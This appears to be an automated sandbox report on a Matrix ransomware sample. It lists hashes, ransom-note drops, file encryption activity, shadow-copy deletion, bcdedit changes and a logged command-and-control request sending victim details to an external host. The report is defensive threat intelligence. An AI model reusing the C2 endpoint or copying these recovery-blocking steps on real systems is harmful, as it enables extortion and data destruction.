Analysis
-
max time kernel
4294211s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20220223-en -
submitted
06-03-2022 04:47
Static task
static1
Behavioral task
behavioral1
Sample
72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
Resource
win10v2004-en-20220113
General
-
Target
72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
-
Size
2.6MB
-
MD5
1f987de3da76b532d5eb4dc0a8e07edc
-
SHA1
2002718bb7d81d6661892c6f2631df27eac89f61
-
SHA256
72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5
-
SHA512
7db16f026aee59ff24e30e7e4ce9a0c7a0d6575b5dc1e7907169fd0fe53a5576deb21e16e7a88d053fe6ea6cec035458539e180e4caac6b46f5e612ce4486310
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
Processes:
72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exedescription ioc process File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\MSBuild\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\plugins\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe HTTP URL 6 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=GZAATBZA|Admin&sid=LQMmMFJj5SYKygNT&phase=14717138B485D1C3|7177|1GB File created C:\Program Files\Google\Chrome\Application\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Users\Default\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Users\All Users\Package Cache\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}v14.30.30704\packages\vcRuntimeAdditional_amd64\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jre7\lib\images\cursors\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Recovery\5e26de02-94e2-11ec-89d5-a6ba382fb892\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\_platform_specific\win_x64\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jre7\lib\fonts\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jre7\lib\amd64\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Users\All Users\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Users\All Users\Microsoft\Assistance\Client\1.0\ja-JP\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jre7\lib\jfr\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Users\Admin\Desktop\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe -
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 892 bcdedit.exe 1280 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 10 512 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
DhyQfpmw64.exedescription ioc process File created C:\Windows\system32\Drivers\PROCEXP152.SYS DhyQfpmw64.exe -
Executes dropped EXE 3 IoCs
Processes:
NWSO8eY2.exeDhyQfpmw.exeDhyQfpmw64.exepid process 1624 NWSO8eY2.exe 1604 DhyQfpmw.exe 1684 DhyQfpmw64.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\ConnectDeny.tiff 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe -
Sets service image path in registry 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\DhyQfpmw.exe upx \Users\Admin\AppData\Local\Temp\DhyQfpmw.exe upx C:\Users\Admin\AppData\Local\Temp\DhyQfpmw.exe upx -
Loads dropped DLL 4 IoCs
Processes:
72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.execmd.exeDhyQfpmw.exepid process 756 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe 756 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe 1600 cmd.exe 1604 DhyQfpmw.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
DhyQfpmw64.exe72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exedescription ioc process File opened (read-only) \??\A: DhyQfpmw64.exe File opened (read-only) \??\B: DhyQfpmw64.exe File opened (read-only) \??\K: DhyQfpmw64.exe File opened (read-only) \??\M: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\U: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\T: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\K: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\H: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\F: DhyQfpmw64.exe File opened (read-only) \??\H: DhyQfpmw64.exe File opened (read-only) \??\Q: DhyQfpmw64.exe File opened (read-only) \??\V: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\V: DhyQfpmw64.exe File opened (read-only) \??\W: DhyQfpmw64.exe File opened (read-only) \??\U: DhyQfpmw64.exe File opened (read-only) \??\R: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\O: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\J: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\G: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\O: DhyQfpmw64.exe File opened (read-only) \??\Y: DhyQfpmw64.exe File opened (read-only) \??\Y: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\I: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\E: DhyQfpmw64.exe File opened (read-only) \??\G: DhyQfpmw64.exe File opened (read-only) \??\J: DhyQfpmw64.exe File opened (read-only) \??\P: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\T: DhyQfpmw64.exe File opened (read-only) \??\X: DhyQfpmw64.exe File opened (read-only) \??\X: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\S: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\L: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\I: DhyQfpmw64.exe File opened (read-only) \??\R: DhyQfpmw64.exe File opened (read-only) \??\Z: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\Q: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\F: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\Z: DhyQfpmw64.exe File opened (read-only) \??\W: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\E: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened (read-only) \??\L: DhyQfpmw64.exe File opened (read-only) \??\M: DhyQfpmw64.exe File opened (read-only) \??\N: DhyQfpmw64.exe File opened (read-only) \??\P: DhyQfpmw64.exe File opened (read-only) \??\S: DhyQfpmw64.exe File opened (read-only) \??\N: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 myexternalip.com -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\3STAYjlo.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exedescription ioc process File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL026.XML 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\J0115875.GIF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21332_.GIF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01629_.WMF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Norfolk 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02369_.WMF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_left_over.gif 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00018_.WMF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241019.WMF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107512.WMF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00516L.GIF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Maroon.css 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185776.WMF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATWIZ.POC 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice-install.log 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01246_.GIF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\uk.pak 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jre7\lib\calendars.properties 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\#FOX_README#.rtf 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18257_.WMF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File B.txt 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185828.WMF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR21F.GIF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.CN.XML 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04267_.WMF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01875_.WMF 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB3A.BDR 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\ReviewRouting_Init.xsn 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PICSTYLES.DPV 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02400_.WMF 